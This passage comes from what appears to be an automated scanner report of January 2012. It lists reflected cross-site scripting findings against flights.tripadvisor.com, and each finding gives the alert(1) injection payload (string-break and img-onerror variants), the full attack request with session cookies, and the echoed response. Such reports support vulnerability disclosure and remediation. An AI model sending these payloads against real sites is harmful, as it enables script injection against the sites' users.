TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:06:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=gcv4nmcp6itcu2jabjn50lq8s2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:14:24 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:06:44 GMT
Connection: close
Content-Length: 31318
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
'0', geo: '60878', source: '', cms: 'Traffic Acquisitions_STM-BBD_TAQ_F_PL229_14264', fare: '0', fareCurrency: '', fareFound: '0', tab: 'price', awConf: '', cobrand: '', plfilter: '', slice: 'av_exp1_1eed47';alert(1)//8433e4e347a', isPartnerLink: false};
IP_COUNTRY = 'US';
META_COUNTRIES = ["US","US","GB","CA","CA","FR","FR","IT","IT","DE","DE","ES","ES","IE","EU"];
search_errors = {};
airport_info = [{"t":"ap","id":"IAD","cou
...[SNIP]...

1.6. http://flights.tripadvisor.com/en_US/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://flights.tripadvisor.com
Path:	/en_US/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ac2d'%3bb6affe968fe was submitted in the REST URL parameter 1. This input was echoed as 4ac2d';b6affe968fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /en_US4ac2d'%3bb6affe968fe/?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=i5ajs4ej4t43eou7hhihh3ht82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:15:22 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:07:42 GMT
Connection: close
Content-Length: 34703
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
lcomeBack":true,"codeshares":true,"logCodeshareStats":true,"afsCenterColumnPlacement":true,"wifiAvailability":true,"feesEstimator":true};
var TA_HOST = 'http://www.tripadvisor.com';
var LOCALE = 'en_US4ac2d';b6affe968fe';
var INVENTORY = 'en_US';
var INVENTORY_COUNTRY = 'US';
var TRIPADVISOR_READONLY = false;
var TYPEAHEAD_URL = 'http://www.tripadvisor.com/TypeAheadJson?action=AIRPORT&callback=?&query=';
var L_LEVEL
...[SNIP]...

1.7. http://flights.tripadvisor.com/en_US/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights.tripadvisor.com
Path:	/en_US/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bead"><img%20src%3da%20onerror%3dalert(1)>620bbf2b724 was submitted in the REST URL parameter 1. This input was echoed as 6bead"><img src=a onerror=alert(1)>620bbf2b724 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en_US6bead"><img%20src%3da%20onerror%3dalert(1)>620bbf2b724/?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=1mgjbb2sg3dhca8o6fmo6ijo84; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:15:16 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:07:36 GMT
Connection: close
Content-Length: 35011
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script src="http://flights-cdn.tripadvisor.com/en_US6bead"><img src=a onerror=alert(1)>620bbf2b724/cat/js/671/dm,j,t,f+d,f+pr,f+l,f+co,locale,flt+result_condenser,flt+bubble,f+ca,flt+carrier_ratings,f+a,f+fe,f+e,f+fll,f+fl,f+i,f+cu,f+pl,f+t,f+rb,f+fg,f+pa,f+s,f+il,f+id,f+fi,f+chf,f+chfd,f+inf,flt+d
...[SNIP]...

1.8. http://flights.tripadvisor.com/en_US/ [cms parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights.tripadvisor.com
Path:	/en_US/

Issue detail

The value of the cms request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a7c'-alert(1)-'3bd094bd8f5 was submitted in the cms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /en_US/?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_1426426a7c'-alert(1)-'3bd094bd8f5 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:07:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=q9oti1q0cdo00m8m3u28bln5h4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:14:41 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:07:01 GMT
Connection: close
Content-Length: 31316
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
_TIMEOUT = 1800;
var AIRWATCH_ENABLED = true;
var send_heartbeat = false;
var PENALTY_BOX_LIMIT = 3;
var FARE_CAL_TIME_WINDOW = 48;
var COMMERCE_SOURCE = 'Traffic Acquisitions_STM-BBD_TAQ_F_PL229_1426426a7c'-alert(1)-'3bd094bd8f5';
var VALUE_WEIGHTS = {"SHOW_WEIGHTS":false,"DOMESTIC":{"stopPenalty":10,"departureTimePenalty":30,"arrivalTimePenalty":30,"durationPenalty":0.8,"bagPenalty":25,"layoverPenalty":20,"shortLayoverPenalt
...[SNIP]...

1.9. http://flights.tripadvisor.com/en_US/ [slice parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights.tripadvisor.com
Path:	/en_US/

Issue detail

The value of the slice request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 726eb'-alert(1)-'b9b7c6f01a0 was submitted in the slice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /en_US/?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1726eb'-alert(1)-'b9b7c6f01a0&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:06:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=f6kuq38h3m1h9cstdga8t74gs3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:14:36 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:06:56 GMT
Connection: close
Content-Length: 31316
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
'0', geo: '60878', source: '', cms: 'Traffic Acquisitions_STM-BBD_TAQ_F_PL229_14264', fare: '0', fareCurrency: '', fareFound: '0', tab: 'price', awConf: '', cobrand: '', plfilter: '', slice: 'av_exp1_1726eb'-alert(1)-'b9b7c6f01a0', isPartnerLink: false};
IP_COUNTRY = 'US';
META_COUNTRIES = ["US","US","GB","CA","CA","FR","FR","IT","IT","DE","DE","ES","ES","IE","EU"];
search_errors = {};
airport_info = [{"t":"ap","id":"IAD","cou
...[SNIP]...

